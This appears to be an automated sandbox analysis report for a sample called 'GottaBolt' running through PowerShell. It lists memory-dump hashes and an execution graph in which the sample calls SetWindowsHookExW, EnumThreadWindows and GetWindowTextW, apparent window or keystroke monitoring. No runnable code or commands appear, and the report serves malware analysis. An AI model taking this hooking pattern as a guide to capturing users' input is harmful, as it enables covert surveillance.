                                                                  • API String ID: 0-701932520
                                                                  • Opcode ID: 20aaf8f7fb829b77e8ced1ca56ce648d97de0d786d189574c48feb78558b3aa3
                                                                  • Instruction ID: 1268d2ec2a2a868f1ad51cef33ee64e141efb18264c04778689a007fbdd98d09
                                                                  • Opcode Fuzzy Hash: 20aaf8f7fb829b77e8ced1ca56ce648d97de0d786d189574c48feb78558b3aa3
                                                                  • Instruction Fuzzy Hash: E1F1D462E0E9C24FF269A62C3C141397FA1FBA2BB0B0909FBD149C74DF55649D0683C9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5{A
                                                                  • API String ID: 0-175539463
                                                                  • Opcode ID: 8ccd648ea206f9c4055403dfc8a0e425a853d3ec009eaa4cb5885e0cf5375c86
                                                                  • Instruction ID: dbd59083a0f9fcd51878244425d39cf2131a12034460ae634560918226589b25
                                                                  • Opcode Fuzzy Hash: 8ccd648ea206f9c4055403dfc8a0e425a853d3ec009eaa4cb5885e0cf5375c86
                                                                  • Instruction Fuzzy Hash: DD91A42771E5629AD200B7BDB8451EDA760EFC13BAB144277D38CCD0939A0D648B87E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0f2aa8fa2ad2b5d4831902ddd4c3e669e04e8cb219562639a88ded345de890b
                                                                  • Instruction ID: 453aa4d14085859653a3ae4b13cabe31669519b6f59540546936bdd7a34948d5
                                                                  • Opcode Fuzzy Hash: e0f2aa8fa2ad2b5d4831902ddd4c3e669e04e8cb219562639a88ded345de890b
                                                                  • Instruction Fuzzy Hash: 9C415A7190DB889FE748DF6C9846AF97BF0EF52320F04426FD086C71A3D625A846CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a6ea453072dad6bfd4ddee3c524d844a8bbdb1c90786975ae1b91d9bbe080f6
                                                                  • Instruction ID: 614dd7cbd63cc201e64fab8702ce8043f011f6ec1d2549b2e89d6745c2a533f7
                                                                  • Opcode Fuzzy Hash: 9a6ea453072dad6bfd4ddee3c524d844a8bbdb1c90786975ae1b91d9bbe080f6
                                                                  • Instruction Fuzzy Hash: 2A41C131A1CB888FDB09DF1CA8066A97BE0FF55310F04426FE44983692DB35A856CBC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2378829088.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e1d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71be8afd965e4baeb6fdc17a14dcd3928680579a21aad4e1f7e77c087602b0fd
                                                                  • Instruction ID: e3bca7313ee8f56d612d5f70f3c082a03111ba6f2340803467e13ad7bd682f25
                                                                  • Opcode Fuzzy Hash: 71be8afd965e4baeb6fdc17a14dcd3928680579a21aad4e1f7e77c087602b0fd
                                                                  • Instruction Fuzzy Hash: 7B41257180DBC54FE39A9B3898559523FF0FF52360F1506EFE088CB1A3DA25A846C792
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8940e088a5a990ff231051e67dff877971cf2a96544eba19aee09f4bfa7b7e08
                                                                  • Instruction ID: e70f65115eec80604560a5e5d5bfb9477d3d83eb89a248928ac55e320e00d498
                                                                  • Opcode Fuzzy Hash: 8940e088a5a990ff231051e67dff877971cf2a96544eba19aee09f4bfa7b7e08
                                                                  • Instruction Fuzzy Hash: 2A115232B0C9698FDB69EA0CF8419BD73E1EB9576071401ABD10AC7196EA25EC1287C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f5855417bbb4cfe07f9ff72ac5f64e02f0c14656f6cd4e8d2a65998cd00a458b
                                                                  • Instruction ID: 2716183127bfd14b37a1bd5a8a6014436c7fcd23ca38f06f7944fdd7550748e0
                                                                  • Opcode Fuzzy Hash: f5855417bbb4cfe07f9ff72ac5f64e02f0c14656f6cd4e8d2a65998cd00a458b
                                                                  • Instruction Fuzzy Hash: DE014432B0C9188FDB69EA0CE4519E873E2EF54765B5400F7E10EC7153EA25EC55C785
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d9de60b8f0434d1a5121a37a502b4f91203ced347bc79325f12b572c10c096b
                                                                  • Instruction ID: a7626b81ef5ea9df1dd1f45ec81a7e2e0e0e6997a8711165aec75e7ce9339b8b
                                                                  • Opcode Fuzzy Hash: 5d9de60b8f0434d1a5121a37a502b4f91203ced347bc79325f12b572c10c096b
                                                                  • Instruction Fuzzy Hash: 5901177111CB0C8FD748EF0CE051AAAB7E0FB99364F10056EE58AC35A5DB32E881CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 33a43510cce1d4e6d66e1e3e0d574c4fad809f6bb70896f9fe823d0bbd0eb0d3
                                                                  • Instruction ID: 6218bb38456f2467afe033b7e7bde6c739a84e0dda17ad951b71bcf27b453dc0
                                                                  • Opcode Fuzzy Hash: 33a43510cce1d4e6d66e1e3e0d574c4fad809f6bb70896f9fe823d0bbd0eb0d3
                                                                  • Instruction Fuzzy Hash: 3EF09A32A0C5988FDB69EA0CF4459A8B3E0FF05320B1800F6E04DC7167EB26EC018744
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21b3b840ecb87bde024c86152962e28f13c95420347d753b13347c05626645bc
                                                                  • Instruction ID: 8983052e09c31fd74b3ed6e9068522e82427ac00626d1b2b65e5570a2ddcf152
                                                                  • Opcode Fuzzy Hash: 21b3b840ecb87bde024c86152962e28f13c95420347d753b13347c05626645bc
                                                                  • Instruction Fuzzy Hash: AAF0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44AC3651DA25E8818786
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25de7a98f95507795369c25734f88909abe14cbe7eeb8daabbb6cbcaddff7274
                                                                  • Instruction ID: c9d26a7b6b5d038b02c67ce7e67f6abad2bee8e32b27ff0e47e62dfdce1133cb
                                                                  • Opcode Fuzzy Hash: 25de7a98f95507795369c25734f88909abe14cbe7eeb8daabbb6cbcaddff7274
                                                                  • Instruction Fuzzy Hash: 30F05832A0D5898FDB69EF1CE4558E8B7E0FF05365B1400F6E20ACB1A3EB26EC448750
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 460c77f2c9b29076d3bd2aaed11e399a579c907736753e7b02f7372a7c84c70c
                                                                  • Instruction ID: 289bd32c7ef0f475adfff38a4af3b4fe86d4e4fe5ab02fd658f0a8ac97004d97
                                                                  • Opcode Fuzzy Hash: 460c77f2c9b29076d3bd2aaed11e399a579c907736753e7b02f7372a7c84c70c
                                                                  • Instruction Fuzzy Hash: 62F0F63080C6898FDB06AF24C8195D87FA0FF26350F0402DBD459C74B2DB749454CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0@)I$0@)I$0@)I$0@)I$0@)I$0@)I$0@)I$B
                                                                  • API String ID: 0-2096621024
                                                                  • Opcode ID: cb970eadc2c70f11bd108d9fb92ded48f75416ad4dc7b8cc5f33a1931d47e761
                                                                  • Instruction ID: 58da0ddd54581ae20309b8bb34f6321afe5c4cef8689c4b21b2e9529601570d5
                                                                  • Opcode Fuzzy Hash: cb970eadc2c70f11bd108d9fb92ded48f75416ad4dc7b8cc5f33a1931d47e761
                                                                  • Instruction Fuzzy Hash: 6AE1E330E1DAC98FEBA9EF28A8556787BE1EF55350B0401FED04DC7193EA28EC468745
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: hG)I$hG)I$hG)I$hG)I
                                                                  • API String ID: 0-246359672
                                                                  • Opcode ID: 17c04be48e024e267c41994a4630016ae10cdac77c8f413f7d1310103b3ee519
                                                                  • Instruction ID: 91b1315def564ddf40f3786144dbbb7439ebbdb78911dfa00572b76b1c7c97ee
                                                                  • Opcode Fuzzy Hash: 17c04be48e024e267c41994a4630016ae10cdac77c8f413f7d1310103b3ee519
                                                                  • Instruction Fuzzy Hash: 6FC1353191EACD5FEBA9AB286C565B57BE1EF96250B0400FED04DC7093EA18EC068352

                                                                  Execution Graph

                                                                  Execution Coverage:8.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:11
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 13263 7ff848f4c9d8 13265 7ff848f4c9e1 13263->13265 13264 7ff848f4cb0b 13265->13264 13266 7ff848f4cb64 GetWindowTextW 13265->13266 13267 7ff848f4cbc9 13266->13267 13255 7ff848f4c3f9 13256 7ff848f4c40f EnumThreadWindows 13255->13256 13258 7ff848f4c4db 13256->13258 13259 7ff848f42755 13261 7ff848f42763 SetWindowsHookExW 13259->13261 13262 7ff848f42851 13261->13262

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID:
                                                                  • API String ID: 530164218-0
                                                                  • Opcode ID: d9a6c99197af96350017047bde3721df40069889db7c1598de273a1bddf13719
                                                                  • Instruction ID: 39bc6e54dd7706e2e28036a2e87afd148f2589ea292d835088ead2a2743ced45
                                                                  • Opcode Fuzzy Hash: d9a6c99197af96350017047bde3721df40069889db7c1598de273a1bddf13719
                                                                  • Instruction Fuzzy Hash: 3381C130518A898FDB69EF28C8457F937E0EF59750F00426EE84ED7292DB34A845CB85

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID:
                                                                  • API String ID: 530164218-0
                                                                  • Opcode ID: fee74765c902fb74d380b863063e7613d37e4abb2b874dae9eb7640e281c687c
                                                                  • Instruction ID: 6c03381315dadeba9f70c9057b2cd041c5ca942148882ca0adc409cc1eaeb0a1
                                                                  • Opcode Fuzzy Hash: fee74765c902fb74d380b863063e7613d37e4abb2b874dae9eb7640e281c687c
                                                                  • Instruction Fuzzy Hash: A3819070518A4D8FEB68EF18C845BF937E0EB59750F00423EE84ED7292DB34A946CB85

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 854 7ff848f42755-7ff848f42761 855 7ff848f4276c-7ff848f4277b 854->855 856 7ff848f42763-7ff848f4276b 854->856 857 7ff848f4277d-7ff848f42785 855->857 858 7ff848f42786-7ff848f427fd 855->858 856->855 857->858 862 7ff848f42889-7ff848f4288d 858->862 863 7ff848f42803-7ff848f42810 858->863 864 7ff848f42812-7ff848f4284f SetWindowsHookExW 862->864 863->864 866 7ff848f42851 864->866 867 7ff848f42857-7ff848f42888 864->867 866->867
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: db67c3ed396cbedaa99e3527b59f812a15c226863f0a44b18d8014c018a0e751
                                                                  • Instruction ID: 37e1cb4c2810b476c3404eba87abf2c20e1deaf90165715375917a02a71bb8dc
                                                                  • Opcode Fuzzy Hash: db67c3ed396cbedaa99e3527b59f812a15c226863f0a44b18d8014c018a0e751
                                                                  • Instruction Fuzzy Hash: 2D41393090CA898FDB19EB68D8466B97BE1FF66321F14027FD049D32D2CB74A852C785

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 870 7ff848f4c3f9-7ff848f4c48a 875 7ff848f4c516-7ff848f4c51a 870->875 876 7ff848f4c490-7ff848f4c49d 870->876 877 7ff848f4c49f-7ff848f4c4d9 EnumThreadWindows 875->877 876->877 879 7ff848f4c4db 877->879 880 7ff848f4c4e1-7ff848f4c515 877->880 879->880
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: EnumThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 2941952884-0
                                                                  • Opcode ID: 98047b2a1537baec7aa3d3d40e1008c3d275b72618d0d4d5800889001e796064
                                                                  • Instruction ID: f603e740ccac6d87e01b2b1224cc3cecabef47116fd39c7934747f68d354947e
                                                                  • Opcode Fuzzy Hash: 98047b2a1537baec7aa3d3d40e1008c3d275b72618d0d4d5800889001e796064
                                                                  • Instruction Fuzzy Hash: 3841093190DB884FD719DB68CC5A6B97FF0EF66711F04416FD08AC31A3CA68A806CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 882 7ff848f4b7a2-7ff848f4c48a 886 7ff848f4c516-7ff848f4c51a 882->886 887 7ff848f4c490-7ff848f4c49d 882->887 888 7ff848f4c49f-7ff848f4c4d9 EnumThreadWindows 886->888 887->888 890 7ff848f4c4db 888->890 891 7ff848f4c4e1-7ff848f4c515 888->891 890->891
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4236322902.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: EnumThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 2941952884-0
                                                                  • Opcode ID: 4ad0b1a46a80b61652c42736f2876157d7c81d4fbeb619f993847dae8aa3b931
                                                                  • Instruction ID: 9f5b281513872086e296bfba5befc821149d740a3dbece254bf5bf2170641335
                                                                  • Opcode Fuzzy Hash: 4ad0b1a46a80b61652c42736f2876157d7c81d4fbeb619f993847dae8aa3b931
                                                                  • Instruction Fuzzy Hash: 7F31CA31A1CA188FDB18EF5CD84A6BD77E0EB69711F00413EE04AD3291DB74A855CB85

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1741 7ff849007b93-7ff849007bb1 1743 7ff849007bb3-7ff849007bbc 1741->1743 1744 7ff849007bbe-7ff849007bc6 1741->1744 1743->1744 1745 7ff849007cbf-7ff849007d5a 1744->1745 1746 7ff849007bcc-7ff849007bd6 1744->1746 1763 7ff849007ec2-7ff849007f73 1745->1763 1764 7ff849007d60-7ff849007d6a 1745->1764 1748 7ff849007bef-7ff849007c63 1746->1748 1749 7ff849007bd8-7ff849007bed 1746->1749 1749->1748 1813 7ff849007f75 1763->1813 1814 7ff849007f7a-7ff849007f8b 1763->1814 1766 7ff849007d83-7ff849007d88 1764->1766 1767 7ff849007d6c-7ff849007d81 1764->1767 1771 7ff849007d8e-7ff849007d91 1766->1771 1772 7ff849007e5b-7ff849007e65 1766->1772 1767->1766 1776 7ff849007d93-7ff849007d9c 1771->1776 1777 7ff849007da8-7ff849007dac 1771->1777 1774 7ff849007e67-7ff849007e75 1772->1774 1775 7ff849007e76-7ff849007ebf 1772->1775 1775->1763 1776->1777 1777->1772 1785 7ff849007db2-7ff849007db5 1777->1785 1786 7ff849007db7-7ff849007dca 1785->1786 1787 7ff849007dcc 1785->1787 1791 7ff849007dce-7ff849007dd0 1786->1791 1787->1791 1791->1772 1792 7ff849007dd6-7ff849007ddc 1791->1792 1795 7ff849007dde-7ff849007deb 1792->1795 1796 7ff849007df8-7ff849007e05 1792->1796 1795->1796 1800 7ff849007ded-7ff849007df6 1795->1800 1801 7ff849007e07-7ff849007e18 1796->1801 1802 7ff849007e19-7ff849007e22 1796->1802 1800->1796 1801->1802 1805 7ff849007e29-7ff849007e32 1802->1805 1807 7ff849007e34-7ff849007e41 1805->1807 1808 7ff849007e4b-7ff849007e5a 1805->1808 1807->1808 1812 7ff849007e43-7ff849007e49 1807->1812 1812->1808 1813->1814 1815 7ff849007f77 1813->1815 1816 7ff849007f92-7ff849008033 1814->1816 1817 7ff849007f8d 1814->1817 1815->1814 1827 7ff849008035-7ff84900804a 1816->1827 1828 7ff8490080af-7ff8490080b9 1816->1828 1817->1816 1819 7ff849007f8f 1817->1819 1819->1816 1827->1828 1833 7ff84900804c-7ff849008059 1827->1833 1830 7ff8490080c5-7ff849008105 1828->1830 1831 7ff8490080bb-7ff8490080c4 1828->1831 1836 7ff84900806d-7ff8490080ac 1833->1836 1837 7ff84900805b-7ff84900806c 1833->1837 1836->1828 1837->1836
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 798fd08b0dc107c4172a16769dae87e0014512bbe6591f7e188a5babb067d41e
                                                                  • Instruction ID: d28276e4590fbfd58ea57d9477c2cbc2647eca861c0281f22e3cd7818cdb6b04
                                                                  • Opcode Fuzzy Hash: 798fd08b0dc107c4172a16769dae87e0014512bbe6591f7e188a5babb067d41e
                                                                  • Instruction Fuzzy Hash: 10022631E0EAC94FE7A6AA386C552747FE1EF96660B0901FBD04DC7193E91CDC4A8352
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49e2e7e2cd4459933141db2adf4002bc856ca383f5a0f6d1e477bf3171c9e2f7
                                                                  • Instruction ID: d0f7746fefd25fb2d03d1ade8f223a601630d7a5ad665487b2baa4d2858f0d6e
                                                                  • Opcode Fuzzy Hash: 49e2e7e2cd4459933141db2adf4002bc856ca383f5a0f6d1e477bf3171c9e2f7
                                                                  • Instruction Fuzzy Hash: 1471F631E1EA8A5FFFA9AA2C68512B576D1EF55350F4801FED50EC31C3FE18E8054246
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c73818f76bd953e69538076dc2cc88f9b60697642f5e097580cdf182c51b5ac
                                                                  • Instruction ID: 54aa54ed4909cf7633832bf169788ce18bb81183097d9eeea4ca4508bc325a8d
                                                                  • Opcode Fuzzy Hash: 7c73818f76bd953e69538076dc2cc88f9b60697642f5e097580cdf182c51b5ac
                                                                  • Instruction Fuzzy Hash: 92212331E1EA8A6FEBA9AA6C685127466D2EF94390F4800FAD00DC72C3FE1CEC454305
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02ac728e4570c105584de6b7e4c5b1f88ca41ace21eb1fa0815491f77b776dd1
                                                                  • Instruction ID: dec3e2d2b259688ffb12edca75ceed480c2fd2aadb66ca1c9cf9b8d8e0aaeb4d
                                                                  • Opcode Fuzzy Hash: 02ac728e4570c105584de6b7e4c5b1f88ca41ace21eb1fa0815491f77b776dd1
                                                                  • Instruction Fuzzy Hash: 0921DA72F1FAD68FEAB569283C451755AD1EFC8BA0B4401F6C50EC3182FD0CEC160186
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8c0a9327d5f9b8da6a2c9e0a9ace6adfe159c38387d8259b799003c61a92894
                                                                  • Instruction ID: 767610a181b48952157ef6ad6efa164cf3405abee6ce5a50d3e398d60431df63
                                                                  • Opcode Fuzzy Hash: f8c0a9327d5f9b8da6a2c9e0a9ace6adfe159c38387d8259b799003c61a92894
                                                                  • Instruction Fuzzy Hash: 2601A132F0DD595FEAA6EA5C78015F9B392EF986A0B5401B7D10DC319AED18EC1183C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7758a8f98f1308c0a992658c1519d3b92a82e6d3bf928f0867869cde1aefd1f
                                                                  • Instruction ID: aefb31a335a0ae13d3c26dff18722778f61131e34de7f93dac0886216ce38e80
                                                                  • Opcode Fuzzy Hash: c7758a8f98f1308c0a992658c1519d3b92a82e6d3bf928f0867869cde1aefd1f
                                                                  • Instruction Fuzzy Hash: EE01CE32F0D9694FEBA6EA5C68065F9B791EFA466074802F7C009C7193EE18AC1583C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 451285a748266004a22df4068f94cf08e95b76ab83b8ad92654539e3a301d667
                                                                  • Instruction ID: 9ff0b52d326fad9b28a93d6a9cf83e363e9c4d602c0c518feef2aa5cb74f4747
                                                                  • Opcode Fuzzy Hash: 451285a748266004a22df4068f94cf08e95b76ab83b8ad92654539e3a301d667
                                                                  • Instruction Fuzzy Hash: 75F0C832F0ED991EFABAE62C24151F995D2EF88690F4841B7D50DC318AFD08DC154245
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4237874520.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ff849000000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba953bac6a4d4232c76eced17e5ec190657f181b6aa6c3e548e442ff7ca654f4
                                                                  • Instruction ID: 0fb408c3888abad874976ecd80d7fbedf35b4ca86e5b46598050a8830e2eec1e
                                                                  • Opcode Fuzzy Hash: ba953bac6a4d4232c76eced17e5ec190657f181b6aa6c3e548e442ff7ca654f4
                                                                  • Instruction Fuzzy Hash: 32F05573E0FAAD0EE7B2F16C340A0EABE80EF646A074802F3C049C7162F900982803C5